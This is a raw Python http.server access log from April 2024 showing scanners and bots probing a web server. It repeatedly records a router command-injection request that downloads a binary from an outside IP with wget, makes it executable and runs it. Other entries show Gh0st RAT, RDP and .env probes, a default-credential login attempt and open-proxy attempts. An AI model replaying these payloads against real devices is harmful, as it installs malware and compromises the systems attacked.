141.98.11.128 - - [24/Apr/2024 09:11:03] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.146.50', 59400) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.146.50 - - [24/Apr/2024 09:12:50] "GET / HTTP/1.1" 200 - 167.94.146.50 - - [24/Apr/2024 09:12:54] "GET / HTTP/1.1" 200 - 167.94.146.50 - - [24/Apr/2024 09:12:54] code 505, message Invalid HTTP version (2.0) 167.94.146.50 - - [24/Apr/2024 09:12:54] "PRI * HTTP/2.0" 505 - 167.94.146.50 - - [24/Apr/2024 09:12:55] code 404, message File not found 167.94.146.50 - - [24/Apr/2024 09:12:55] "GET /favicon.ico HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.146.62', 38564) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.146.62 - - [24/Apr/2024 09:25:34] "GET / HTTP/1.1" 200 - 167.94.146.62 - - [24/Apr/2024 09:25:37] "GET / HTTP/1.1" 200 - 167.94.146.62 - - [24/Apr/2024 09:25:38] code 505, message Invalid HTTP version (2.0) 167.94.146.62 - - [24/Apr/2024 09:25:38] "PRI * HTTP/2.0" 505 - 167.94.146.62 - - [24/Apr/2024 09:25:39] code 404, message File not found 167.94.146.62 - - [24/Apr/2024 09:25:39] "GET /favicon.ico HTTP/1.1" 404 - 146.19.24.28 - - [24/Apr/2024 09:36:40] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [24/Apr/2024 09:38:14] "GET / HTTP/1.1" 200 - 60.191.125.35 - - [24/Apr/2024 09:39:41] code 404, message File not found 60.191.125.35 - - [24/Apr/2024 09:39:41] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 404 - 185.191.126.213 - - [24/Apr/2024 10:25:04] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [24/Apr/2024 11:08:54] "GET / HTTP/1.1" 200 - 66.240.205.34 - - [24/Apr/2024 11:48:11] code 400, message Bad request version ('®¯]') 66.240.205.34 - - [24/Apr/2024 11:48:11] "Gh0st­\x00\x00\x00à\x00\x00\x00x\x9cKS``\x98ÃÀÀÀ\x06Ä\x8c@¼Q\x96\x81\x81\x09H\x07§\x16\x95e&§*\x04$&g+\x182\x94ö°00¬¨rc\x00\x01\x11 \x82\x1f\\`&\x83ÇK7\x86\x19ån\x0c9\x95n\x0c;\x84\x0f3¬èsch¨^Ï4'J\x97©\x82ã0Ã\x91h]&\x90øÎ\x97SËA4L?2=áÄ\x92\x86\x0b@õ`\x0cT\x1f®¯]" 400 - 179.43.190.218 - - [24/Apr/2024 11:49:22] code 404, message File not found 179.43.190.218 - - [24/Apr/2024 11:49:22] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Fbin%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 34.76.158.233 - - [24/Apr/2024 11:51:37] "GET / HTTP/1.1" 200 - 45.79.181.251 - - [24/Apr/2024 11:54:19] code 400, message Bad request version ('À\\x14À') 45.79.181.251 - - [24/Apr/2024 11:54:19] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03\\Ò\x19\x93o·Ý-´^\x90¼\x922\x90ÄÊ.ßźë'¤mú¼<\x12r\x95u\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 114.67.183.11 - - [24/Apr/2024 12:38:16] "GET / HTTP/1.1" 200 - 64.62.197.204 - - [24/Apr/2024 13:03:41] code 400, message Bad request version ('À\\x14À') 64.62.197.204 - - [24/Apr/2024 13:03:41] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03¸\x1c|\x8dÌvÔ$^cÃ-¨¼\x17ù\x0d\x19²[@ªmm6\x82\x81$R\x18<Ä\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 205.210.31.185 - - [24/Apr/2024 13:19:39] "GET / HTTP/1.0" 200 - 141.98.11.128 - - [24/Apr/2024 13:48:59] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [24/Apr/2024 14:08:01] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [24/Apr/2024 14:08:01] "CONNECT google.com:443 HTTP/1.1" 501 - 141.98.11.128 - - [24/Apr/2024 14:32:24] "GET / HTTP/1.1" 200 - 192.155.90.220 - - [24/Apr/2024 14:37:18] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [24/Apr/2024 14:42:26] "GET / HTTP/1.1" 200 - 23.90.165.44 - - [24/Apr/2024 15:03:21] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [24/Apr/2024 15:19:32] "GET / HTTP/1.1" 200 - 141.98.11.128 - - [24/Apr/2024 15:59:27] "GET / HTTP/1.1" 200 - 194.165.16.73 - - [24/Apr/2024 16:04:46] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 194.165.16.73 - - [24/Apr/2024 16:04:46] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 146.19.24.28 - - [24/Apr/2024 16:12:41] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [24/Apr/2024 16:13:48] code 404, message File not found 179.43.190.218 - - [24/Apr/2024 16:13:48] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 141.98.11.128 - - [24/Apr/2024 16:31:25] "GET / HTTP/1.1" 200 - 193.106.29.125 - - [24/Apr/2024 16:43:13] "GET / HTTP/1.0" 200 - 143.110.166.46 - - [24/Apr/2024 17:39:54] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x01þ\\x01\\x00\\x01ú\\x03\\x03\\x15B\\'¨3_Ü\\x80$%J\\x9e\\x9f\\x94à"³tÁwøSÙ(ùI\\x18é\\x18ÿð"\\x00\\x01<Ì\\x14Ì\\x13Ì\\x15À0À,À(À$À\\x14À') 143.110.166.46 - - [24/Apr/2024 17:39:54] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03\x15B'¨3_Ü\x80$%J\x9e\x9f\x94à"³tÁwøSÙ(ùI\x18é\x18ÿð"\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 78.153.140.179 - - [24/Apr/2024 18:25:10] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00Þ\\x01\\x00\\x00Ú\\x03\\x03EC5¶Vý\\x95ÆsÊÆt*\\x05ÁÙêï\\x17ñ½2Ø\\x94ÛÂv\\x06!6ìs\\x00\\x00nÀ0À,À2À.À/À+À1À-\\x00¥\\x00£\\x00¡\\x00\\x9f\\x00¤\\x00¢\\x00') 78.153.140.179 - - [24/Apr/2024 18:25:10] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03EC5¶Vý\x95ÆsÊÆt*\x05ÁÙêï\x17ñ½2Ø\x94ÛÂv\x06!6ìs\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 78.153.140.179 - - [24/Apr/2024 18:25:10] code 404, message File not found 78.153.140.179 - - [24/Apr/2024 18:25:10] "GET /.env HTTP/1.1" 404 - 179.43.190.218 - - [24/Apr/2024 18:54:37] code 404, message File not found 179.43.190.218 - - [24/Apr/2024 18:54:37] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 141.98.11.128 - - [24/Apr/2024 19:37:24] "GET / HTTP/1.1" 200 - 45.128.232.229 - - [24/Apr/2024 19:51:04] code 501, message Unsupported method ('POST') 45.128.232.229 - - [24/Apr/2024 19:51:04] "POST /cgi-bin/param.cgi?post_network_other_conf HTTP/1.1" 501 - 141.98.11.128 - - [24/Apr/2024 19:56:18] "GET / HTTP/1.1" 200 - 107.170.243.28 - - [24/Apr/2024 20:02:43] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [24/Apr/2024 20:15:39] "GET / HTTP/1.1" 200 - 198.235.24.169 - - [24/Apr/2024 20:22:36] code 400, message Bad request version ('À\\x13À') 198.235.24.169 - - [24/Apr/2024 20:22:36] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03IxS|I\x88]±ooèæM\x15TFË\x8e\x18¹Í¾>г\x82È­\x1b\x1fÚ\x04 I_T=Õ»\x9a,É\x02±\x88\x19Ú\x90׬\x0cpoýÐ>­ãîtúß\x00"6\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.169 - - [24/Apr/2024 20:22:37] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.169 - - [24/Apr/2024 20:22:37] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03¡¥\x8c²¯\x16\x01B\x1a¾\x89E\x80\x90eëó&$;\x9cï\x13׿»,\x1d $\x82õ\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 87.121.69.52 - - [24/Apr/2024 20:46:47] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [24/Apr/2024 20:46:47] "CONNECT google.com:443 HTTP/1.1" 501 - 185.170.144.3 - - [24/Apr/2024 21:03:10] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.170.144.3 - - [24/Apr/2024 21:03:10] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 103.149.26.239 - - [24/Apr/2024 21:36:29] "GET / HTTP/1.1" 200 - 152.32.173.15 - - [24/Apr/2024 21:37:09] "GET / HTTP/1.1" 200 - 152.32.173.15 - - [24/Apr/2024 21:37:10] code 400, message Bad request version ('\\x81èvjgõÎv|\\x9bÙ¹\\x8eÉÂ2') 152.32.173.15 - - [24/Apr/2024 21:37:10] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03 áj*[À\x06Åi\x87¡D¶#\x1b2\x90,2ÏbíHþéd±®e\x8f^p \x81èvjgõÎv|\x9bÙ¹\x8eÉÂ2" 400 - 152.32.173.15 - - [24/Apr/2024 21:37:11] code 400, message Bad HTTP/0.9 request type ('t3') 152.32.173.15 - - [24/Apr/2024 21:37:11] "t3 12.1.2" 400 - 80.94.92.60 - - [24/Apr/2024 21:44:30] "GET / HTTP/1.1" 200 - 216.218.206.69 - - [24/Apr/2024 22:16:44] "GET / HTTP/1.1" 200 - 179.43.190.218 - - [24/Apr/2024 22:19:52] code 404, message File not found 179.43.190.218 - - [24/Apr/2024 22:19:52] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 216.218.206.69 - - [24/Apr/2024 22:21:07] code 404, message File not found 216.218.206.69 - - [24/Apr/2024 22:21:07] "GET /favicon.ico HTTP/1.1" 404 - 216.218.206.69 - - [24/Apr/2024 22:22:27] code 404, message File not found 216.218.206.69 - - [24/Apr/2024 22:22:27] "GET /geoserver/web/ HTTP/1.1" 404 - 146.19.24.28 - - [24/Apr/2024 22:39:25] "GET / HTTP/1.1" 200 - 205.210.31.4 - - [24/Apr/2024 23:04:47] "GET / HTTP/1.1" 200 - 122.194.11.108 - - [24/Apr/2024 23:20:50] code 404, message File not found 122.194.11.108 - - [24/Apr/2024 23:20:50] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - 152.42.176.18 - - [24/Apr/2024 23:30:33] code 404, message File not found 152.42.176.18 - - [24/Apr/2024 23:30:33] "GET http://httpbin.org/ip HTTP/1.1" 404 - 45.142.182.92 - - [25/Apr/2024 00:27:18] code 404, message File not found 45.142.182.92 - - [25/Apr/2024 00:27:18] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.224.128.43 - - [25/Apr/2024 00:55:07] "GET / HTTP/1.1" 200 - 87.121.69.22 - - [25/Apr/2024 01:21:15] code 501, message Unsupported method ('CONNECT') 87.121.69.22 - - [25/Apr/2024 01:21:15] "CONNECT files.vc:443 HTTP/1.1" 501 - 87.121.69.52 - - [25/Apr/2024 02:21:52] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [25/Apr/2024 02:21:52] "CONNECT google.com:443 HTTP/1.1" 501 - 80.94.92.60 - - [25/Apr/2024 02:22:19] code 501, message Unsupported method ('POST') 80.94.92.60 - - [25/Apr/2024 02:22:19] "POST /cgi-bin/jumpto.php?class=diagnosis&page=config_save&isphp=1 HTTP/1.1" 501 - 172.104.131.24 - - [25/Apr/2024 02:39:21] "GET / HTTP/1.1" 200 - 179.43.191.18 - - [25/Apr/2024 03:26:49] code 404, message File not found 179.43.191.18 - - [25/Apr/2024 03:26:49] "GET /mailman/listinfo/mailman HTTP/1.1" 404 - 179.43.191.18 - - [25/Apr/2024 03:26:50] code 400, message Bad request version ('À\\x14À') 179.43.191.18 - - [25/Apr/2024 03:26:50] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03¬a\x01À\x1d?b­\x9b\x1bx\x15\x9b\x15kÜXÅ¡ÅnÝÀH\x09µÞoóÿz÷\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 46.174.191.29 - - [25/Apr/2024 03:44:53] "GET / HTTP/1.0" 200 - 87.121.69.22 - - [25/Apr/2024 03:51:29] code 501, message Unsupported method ('CONNECT') 87.121.69.22 - - [25/Apr/2024 03:51:29] "CONNECT files.vc:443 HTTP/1.1" 501 - 83.97.73.245 - - [25/Apr/2024 05:18:57] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 146.19.24.28 - - [25/Apr/2024 05:49:27] "GET / HTTP/1.1" 200 - 185.242.226.10 - - [25/Apr/2024 05:57:17] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [25/Apr/2024 06:03:29] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [25/Apr/2024 06:03:57] code 404, message File not found 83.97.73.245 - - [25/Apr/2024 06:03:57] "GET /actuator/gateway/routes HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:03] "GET / HTTP/1.1" 200 - 211.233.24.7 - - [25/Apr/2024 06:10:09] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:09] "GET /index.action HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:14] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:14] "GET /login.action HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:20] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:20] "GET /index.do HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:25] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:25] "GET /index.jsp HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:30] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:30] "GET /login.do HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:36] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:36] "GET /login.jsp HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:41] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:41] "GET /main.jsp HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:46] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:46] "GET /default.jsp HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:52] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:52] "GET /register.jsp HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:10:57] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:10:57] "GET /login/login.jsp HTTP/1.1" 404 - 164.52.0.94 - - [25/Apr/2024 06:10:58] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01ü\\x03\\x03ZÓíñ¥\\x19ÊÜaL\\x87\\x08\\x99\\x9eå+¹cGôÇ\\x11(óð\\x8fó%\\x96\\x08V\\\\') 164.52.0.94 - - [25/Apr/2024 06:10:58] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03ZÓíñ¥\x19ÊÜaL\x87\x08\x99\x9eå+¹cGôÇ\x11(óð\x8fó%\x96\x08V\\ \x80Ò°\x19ñ¨oâ»·÷À\x98V9¿j\x07ÄWÆóHæ1éЫõ20\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9f̨̩̪À+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ" 400 - 211.233.24.7 - - [25/Apr/2024 06:11:03] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:11:03] "GET /login/indexAction.action HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:11:08] code 404, message File not found 211.233.24.7 - - [25/Apr/2024 06:11:08] "GET /indexAction.action HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:11:14] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:14] "POST / HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:11:20] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:20] "POST /index.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:11:26] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:26] "POST /login.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:11:31] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:31] "POST /index.do HTTP/1.1" 501 - 164.52.0.94 - - [25/Apr/2024 06:11:36] "GET / HTTP/1.1" 200 - 211.233.24.7 - - [25/Apr/2024 06:11:37] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:37] "POST /index.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:11:43] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:43] "POST /login.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:11:48] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:48] "POST /login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:11:54] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:11:54] "POST /main.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:00] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:00] "POST /default.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:06] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:06] "POST /register.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:12] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:12] "POST /login/login.jsp HTTP/1.1" 501 - 164.52.0.94 - - [25/Apr/2024 06:12:13] code 404, message File not found 164.52.0.94 - - [25/Apr/2024 06:12:13] "GET /favicon.ico HTTP/1.1" 404 - 211.233.24.7 - - [25/Apr/2024 06:12:18] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:18] "POST /login/indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:24] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:24] "POST /indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:29] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:29] "POST / HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:35] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:35] "POST /index.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:41] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:41] "POST /login.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:46] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:46] "POST /index.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:52] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:52] "POST /index.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:12:59] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:12:59] "POST /login.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:13:06] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:06] "POST /login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:13:13] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:13] "POST /main.jsp HTTP/1.1" 501 - 80.66.83.49 - - [25/Apr/2024 06:13:14] code 400, message Bad request syntax ('\\x04\\x01\\x00\\x194eÂ\\x05\\x00') 80.66.83.49 - - [25/Apr/2024 06:13:14] "\x04\x01\x00\x194eÂ\x05\x00" 400 - 211.233.24.7 - - [25/Apr/2024 06:13:19] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:19] "POST /default.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:13:26] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:26] "POST /register.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:13:33] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:33] "POST /login/login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:13:39] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:39] "POST /login/indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:13:46] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:46] "POST /indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:13:52] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:13:52] "POST / HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:00] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:00] "POST /index.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:07] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:07] "POST /login.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:15] code 501, message Unsupported method ('POST') 80.66.83.49 - - [25/Apr/2024 06:14:15] code 400, message Bad request syntax ('\\x05\\x01\\x00') 80.66.83.49 - - [25/Apr/2024 06:14:15] "\x05\x01\x00" 400 - 211.233.24.7 - - [25/Apr/2024 06:14:15] "POST /index.do HTTP/1.1" 501 - 80.66.83.49 - - [25/Apr/2024 06:14:15] code 501, message Unsupported method ('CONNECT') 80.66.83.49 - - [25/Apr/2024 06:14:15] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:22] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:22] "POST /index.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:29] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:29] "POST /login.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:36] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:36] "POST /login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:44] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:44] "POST /main.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:51] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:51] "POST /default.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:14:58] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:14:58] "POST /register.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:05] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:05] "POST /login/login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:12] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:12] "POST /login/indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:19] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:19] "POST /indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:26] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:26] "POST / HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:33] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:33] "POST /index.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:39] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:39] "POST /login.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:46] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:46] "POST /index.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:52] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:52] "POST /index.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:15:59] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:15:59] "POST /login.do HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:07] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:16:07] "POST /login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:14] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:16:14] "POST /main.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:21] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:16:21] "POST /default.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:29] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:16:29] "POST /register.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:35] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:16:35] "POST /login/login.jsp HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:42] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:16:42] "POST /login/indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:49] code 501, message Unsupported method ('POST') 211.233.24.7 - - [25/Apr/2024 06:16:49] "POST /indexAction.action HTTP/1.1" 501 - 211.233.24.7 - - [25/Apr/2024 06:16:56] code 501, message Unsupported method ('POST') 211.233.24.7 - - 